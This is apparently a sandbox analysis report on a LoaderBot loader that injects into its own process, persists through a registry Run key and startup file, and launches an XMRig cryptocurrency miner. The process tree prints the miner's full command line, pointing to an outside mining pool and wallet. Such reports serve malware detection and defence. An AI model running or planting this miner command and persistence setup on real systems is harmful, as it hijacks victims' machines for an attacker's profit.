loaderbot | 2b9df917c6efd68e0b700634a4e551950b86a730bd316690668e4e43b31d09ee

Analysis

max time kernel
150s
max time network
140s
platform
windows10-2004_x64
resource
win10v2004-20231222-en
resource tags

arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system
submitted
26-12-2023 05:19

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

572f91333f0ef870aa2a3ab21fdef3ee.exe
Size

2.1MB
MD5

572f91333f0ef870aa2a3ab21fdef3ee
SHA1

6e3de75d0ef2d51040714517b27fd67abb143e3d
SHA256

2b9df917c6efd68e0b700634a4e551950b86a730bd316690668e4e43b31d09ee
SHA512

7d90723b77a1e8e65be666940b05f18197f0ed91fc7ab6b4b639ad81b36d65fae2a1b3869a5255258d74499eaeed647852c79298f4f783523bafd3251db91131
SSDEEP

49152:AWM2OSAUhB0ETI++BrpMLdDQXWb+FPWRtr8HJ:XM2DD5IhBrpCFQXk+FPWf0J

Score

10^/10

loaderbot xmrig loader miner persistence

Malware Config

Signatures

LoaderBot
LoaderBot is a loader written in .NET downloading and executing miners.
loader miner loaderbot
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

LoaderBot executable 1 IoCs

resource	yara_rule
behavioral2/memory/4128-8-0x0000000000400000-0x00000000007FE000-memory.dmp	loaderbot

XMRig Miner payload 14 IoCs

miner

resource	yara_rule
behavioral2/memory/2800-30-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/4988-34-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/4988-35-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/4988-42-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/4988-43-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/4988-45-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/4988-49-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/4988-50-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/4988-51-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/4988-52-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/4988-53-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/4988-54-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/4988-55-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/4988-56-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation	572f91333f0ef870aa2a3ab21fdef3ee.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url	572f91333f0ef870aa2a3ab21fdef3ee.exe

Executes dropped EXE 2 IoCs

pid	Process
2800	Driver.exe
4988	Driver.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Driver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\572f91333f0ef870aa2a3ab21fdef3ee.exe"	572f91333f0ef870aa2a3ab21fdef3ee.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4800 set thread context of 4128	4800	572f91333f0ef870aa2a3ab21fdef3ee.exe	92

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4128	572f91333f0ef870aa2a3ab21fdef3ee.exe
4128	572f91333f0ef870aa2a3ab21fdef3ee.exe
4128	572f91333f0ef870aa2a3ab21fdef3ee.exe
4128	572f91333f0ef870aa2a3ab21fdef3ee.exe
4128	572f91333f0ef870aa2a3ab21fdef3ee.exe
4128	572f91333f0ef870aa2a3ab21fdef3ee.exe
4128	572f91333f0ef870aa2a3ab21fdef3ee.exe
4128	572f91333f0ef870aa2a3ab21fdef3ee.exe
4128	572f91333f0ef870aa2a3ab21fdef3ee.exe
4128	572f91333f0ef870aa2a3ab21fdef3ee.exe
4128	572f91333f0ef870aa2a3ab21fdef3ee.exe
4128	572f91333f0ef870aa2a3ab21fdef3ee.exe
4128	572f91333f0ef870aa2a3ab21fdef3ee.exe
4128	572f91333f0ef870aa2a3ab21fdef3ee.exe
4128	572f91333f0ef870aa2a3ab21fdef3ee.exe
4128	572f91333f0ef870aa2a3ab21fdef3ee.exe
4128	572f91333f0ef870aa2a3ab21fdef3ee.exe
4128	572f91333f0ef870aa2a3ab21fdef3ee.exe
4128	572f91333f0ef870aa2a3ab21fdef3ee.exe
4128	572f91333f0ef870aa2a3ab21fdef3ee.exe
4128	572f91333f0ef870aa2a3ab21fdef3ee.exe
4128	572f91333f0ef870aa2a3ab21fdef3ee.exe
4128	572f91333f0ef870aa2a3ab21fdef3ee.exe
4128	572f91333f0ef870aa2a3ab21fdef3ee.exe
4128	572f91333f0ef870aa2a3ab21fdef3ee.exe
4128	572f91333f0ef870aa2a3ab21fdef3ee.exe
4128	572f91333f0ef870aa2a3ab21fdef3ee.exe
4128	572f91333f0ef870aa2a3ab21fdef3ee.exe
4128	572f91333f0ef870aa2a3ab21fdef3ee.exe
4128	572f91333f0ef870aa2a3ab21fdef3ee.exe
4128	572f91333f0ef870aa2a3ab21fdef3ee.exe
4128	572f91333f0ef870aa2a3ab21fdef3ee.exe
4128	572f91333f0ef870aa2a3ab21fdef3ee.exe
4128	572f91333f0ef870aa2a3ab21fdef3ee.exe
4128	572f91333f0ef870aa2a3ab21fdef3ee.exe
4128	572f91333f0ef870aa2a3ab21fdef3ee.exe
4128	572f91333f0ef870aa2a3ab21fdef3ee.exe
4128	572f91333f0ef870aa2a3ab21fdef3ee.exe
4128	572f91333f0ef870aa2a3ab21fdef3ee.exe
4128	572f91333f0ef870aa2a3ab21fdef3ee.exe
4128	572f91333f0ef870aa2a3ab21fdef3ee.exe
4128	572f91333f0ef870aa2a3ab21fdef3ee.exe
4128	572f91333f0ef870aa2a3ab21fdef3ee.exe
4128	572f91333f0ef870aa2a3ab21fdef3ee.exe
4128	572f91333f0ef870aa2a3ab21fdef3ee.exe
4128	572f91333f0ef870aa2a3ab21fdef3ee.exe
4128	572f91333f0ef870aa2a3ab21fdef3ee.exe
4128	572f91333f0ef870aa2a3ab21fdef3ee.exe
4128	572f91333f0ef870aa2a3ab21fdef3ee.exe
4128	572f91333f0ef870aa2a3ab21fdef3ee.exe
4128	572f91333f0ef870aa2a3ab21fdef3ee.exe
4128	572f91333f0ef870aa2a3ab21fdef3ee.exe
4128	572f91333f0ef870aa2a3ab21fdef3ee.exe
4128	572f91333f0ef870aa2a3ab21fdef3ee.exe
4128	572f91333f0ef870aa2a3ab21fdef3ee.exe
4128	572f91333f0ef870aa2a3ab21fdef3ee.exe
4128	572f91333f0ef870aa2a3ab21fdef3ee.exe
4128	572f91333f0ef870aa2a3ab21fdef3ee.exe
4128	572f91333f0ef870aa2a3ab21fdef3ee.exe
4128	572f91333f0ef870aa2a3ab21fdef3ee.exe
4128	572f91333f0ef870aa2a3ab21fdef3ee.exe
4128	572f91333f0ef870aa2a3ab21fdef3ee.exe
4128	572f91333f0ef870aa2a3ab21fdef3ee.exe
4128	572f91333f0ef870aa2a3ab21fdef3ee.exe

Suspicious behavior: RenamesItself 1 IoCs

pid	Process
4128	572f91333f0ef870aa2a3ab21fdef3ee.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

description	pid	Process
Token: SeDebugPrivilege	4800	572f91333f0ef870aa2a3ab21fdef3ee.exe
Token: SeDebugPrivilege	4128	572f91333f0ef870aa2a3ab21fdef3ee.exe
Token: SeLockMemoryPrivilege	2800	Driver.exe
Token: SeLockMemoryPrivilege	2800	Driver.exe
Token: SeLockMemoryPrivilege	4988	Driver.exe
Token: SeLockMemoryPrivilege	4988	Driver.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 4800 wrote to memory of 4128	4800	572f91333f0ef870aa2a3ab21fdef3ee.exe	92
PID 4800 wrote to memory of 4128	4800	572f91333f0ef870aa2a3ab21fdef3ee.exe	92
PID 4800 wrote to memory of 4128	4800	572f91333f0ef870aa2a3ab21fdef3ee.exe	92
PID 4800 wrote to memory of 4128	4800	572f91333f0ef870aa2a3ab21fdef3ee.exe	92
PID 4800 wrote to memory of 4128	4800	572f91333f0ef870aa2a3ab21fdef3ee.exe	92
PID 4800 wrote to memory of 4128	4800	572f91333f0ef870aa2a3ab21fdef3ee.exe	92
PID 4800 wrote to memory of 4128	4800	572f91333f0ef870aa2a3ab21fdef3ee.exe	92
PID 4800 wrote to memory of 4128	4800	572f91333f0ef870aa2a3ab21fdef3ee.exe	92
PID 4128 wrote to memory of 2800	4128	572f91333f0ef870aa2a3ab21fdef3ee.exe	94
PID 4128 wrote to memory of 2800	4128	572f91333f0ef870aa2a3ab21fdef3ee.exe	94
PID 4128 wrote to memory of 4988	4128	572f91333f0ef870aa2a3ab21fdef3ee.exe	99
PID 4128 wrote to memory of 4988	4128	572f91333f0ef870aa2a3ab21fdef3ee.exe	99

C:\Users\Admin\AppData\Local\Temp\572f91333f0ef870aa2a3ab21fdef3ee.exe
"C:\Users\Admin\AppData\Local\Temp\572f91333f0ef870aa2a3ab21fdef3ee.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4800
- C:\Users\Admin\AppData\Local\Temp\572f91333f0ef870aa2a3ab21fdef3ee.exe
  C:\Users\Admin\AppData\Local\Temp\572f91333f0ef870aa2a3ab21fdef3ee.exe
  2⤵
  - Checks computer location settings
  - Drops startup file
  - Adds Run key to start application
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: RenamesItself
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4128
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 49ciCfWrkhQWz6LYXux4LV1P5eAFMfox1H2y3k6VSn7Jb39nDYDUiC6JFCUBDDf63GQqpKc5ZQQ8vCHwgzesAKHtJwB9o2i -p x -k -v=0 --donate-level=1 -t 4
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:2800
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 49ciCfWrkhQWz6LYXux4LV1P5eAFMfox1H2y3k6VSn7Jb39nDYDUiC6JFCUBDDf63GQqpKc5ZQQ8vCHwgzesAKHtJwB9o2i -p x -k -v=0 --donate-level=1 -t 4
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:4988

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\572f91333f0ef870aa2a3ab21fdef3ee.exe.log

Filesize
605B

MD5
3654bd2c6957761095206ffdf92b0cb9

SHA1
6f10f7b5867877de7629afcff644c265e79b4ad3

SHA256
c2a4be94cf4ed33d698d9838f4ffb47047da796e733ec11562463a1621212ab4

SHA512
e2a81248cca7732ce098088d5237897493fd3629e28d66bc13e5f9191f72cd52893f4a53905906af12d5c6de475738b6c7f6b718a32869e9ee0deb3a54672f79

Download Submit
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

Filesize
138KB

MD5
abd7bfc8dac562f472b04ef3e55f1854

SHA1
df1f70b178fd626ccaa3232a88552e7f35a47a6e

SHA256
8dd37ba4d41fa3e14fff5063cc53a7e44c5f8c156c4b8fb6087c6d3c7f02d39e

SHA512
9dc411011b21b143c260e342dc92081e817790b02a82a50d65c3bcca02a3ac6ecad91537d78735394cb0b7f4560e875f04cb174834ca8ab502da2da92ab39520

Download Submit
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

Filesize
126KB

MD5
5034ff4e4362a941008d1edbeae90516

SHA1
8878dea50de9986b52554405da8d550396899d57

SHA256
5eb4cf494390caeaec51adcc33b839c047e070eb3c1bf1a0e2d2f10f0d203361

SHA512
de58f7f7c493e2abf67d250b0e3298ebc006135861d3efbb5b845d26a09e9683d8f2b5221a16543ed8ff035c73c4f6fda31308d4f42729f30ce130d5ce7de5cc

Download Submit
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

Filesize
111KB

MD5
3f036e75605c8fc4487d567db2622240

SHA1
c903f9007f709e2e460cd16a3ff10b07884e2991

SHA256
d777a144dca27bc4361603db59f0e17e8606b288f99cd270258988506783d844

SHA512
fa31b3dbe9fe3d257433a4588983b53a2e30dfb83ad1de7254d85a55e4ee83221396a8cf2b6ddbc54a18b532c2c6b4ef6c92bb21be838da7d3c9861bfe09a22b

Download Submit
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

Filesize
12KB

MD5
d942d1cdb89d09af104473d78e32cebb

SHA1
7a23446d8319e2e1cb21b35a0a878365e4240702

SHA256
bbf83d5088dba3ce2cd35e2b65e29790fc14c60b3e6ff136c225928e23318900

SHA512
be2c1c49f7e9e3047ed2cc0b7f3396bdea36af353f3040328009f036b2260af14dc52c0fca1f534aa521b7e9f830993d189b13acc56fdb57134bab7faf839c54

Download Submit
memory/2800-30-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2800-28-0x0000000000510000-0x0000000000524000-memory.dmp

Filesize
80KB

Download
memory/2800-29-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/4128-14-0x0000000074C30000-0x00000000753E0000-memory.dmp

Filesize
7.7MB

Download
memory/4128-16-0x0000000005760000-0x00000000057C6000-memory.dmp

Filesize
408KB

Download
memory/4128-41-0x0000000005550000-0x0000000005560000-memory.dmp

Filesize
64KB

Download
memory/4128-8-0x0000000000400000-0x00000000007FE000-memory.dmp

Filesize
4.0MB

Download
memory/4128-38-0x0000000074C30000-0x00000000753E0000-memory.dmp

Filesize
7.7MB

Download
memory/4128-17-0x0000000005550000-0x0000000005560000-memory.dmp

Filesize
64KB

Download
memory/4800-7-0x0000000005A90000-0x0000000005AAE000-memory.dmp

Filesize
120KB

Download
memory/4800-11-0x0000000005AD0000-0x0000000005AE0000-memory.dmp

Filesize
64KB

Download
memory/4800-5-0x0000000005A20000-0x0000000005A40000-memory.dmp

Filesize
128KB

Download
memory/4800-6-0x0000000005B60000-0x0000000005BD6000-memory.dmp

Filesize
472KB

Download
memory/4800-4-0x0000000074C30000-0x00000000753E0000-memory.dmp

Filesize
7.7MB

Download
memory/4800-3-0x0000000003450000-0x0000000003451000-memory.dmp

Filesize
4KB

Download
memory/4800-2-0x0000000005AD0000-0x0000000005AE0000-memory.dmp

Filesize
64KB

Download
memory/4800-0-0x0000000000E20000-0x0000000001034000-memory.dmp

Filesize
2.1MB

Download
memory/4800-1-0x0000000074C30000-0x00000000753E0000-memory.dmp

Filesize
7.7MB

Download
memory/4800-12-0x0000000074C30000-0x00000000753E0000-memory.dmp

Filesize
7.7MB

Download
memory/4988-33-0x00000000020E0000-0x0000000002100000-memory.dmp

Filesize
128KB

Download
memory/4988-36-0x0000000002220000-0x0000000002240000-memory.dmp

Filesize
128KB

Download
memory/4988-37-0x0000000002240000-0x0000000002260000-memory.dmp

Filesize
128KB

Download
memory/4988-35-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/4988-39-0x0000000002260000-0x0000000002280000-memory.dmp

Filesize
128KB

Download
memory/4988-40-0x0000000002280000-0x00000000022A0000-memory.dmp

Filesize
128KB

Download
memory/4988-34-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/4988-42-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/4988-43-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/4988-44-0x0000000002220000-0x0000000002240000-memory.dmp

Filesize
128KB

Download
memory/4988-46-0x0000000002240000-0x0000000002260000-memory.dmp

Filesize
128KB

Download
memory/4988-45-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/4988-47-0x0000000002260000-0x0000000002280000-memory.dmp

Filesize
128KB

Download
memory/4988-48-0x0000000002280000-0x00000000022A0000-memory.dmp

Filesize
128KB

Download
memory/4988-49-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/4988-50-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/4988-51-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/4988-52-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/4988-53-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/4988-54-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/4988-55-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/4988-56-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download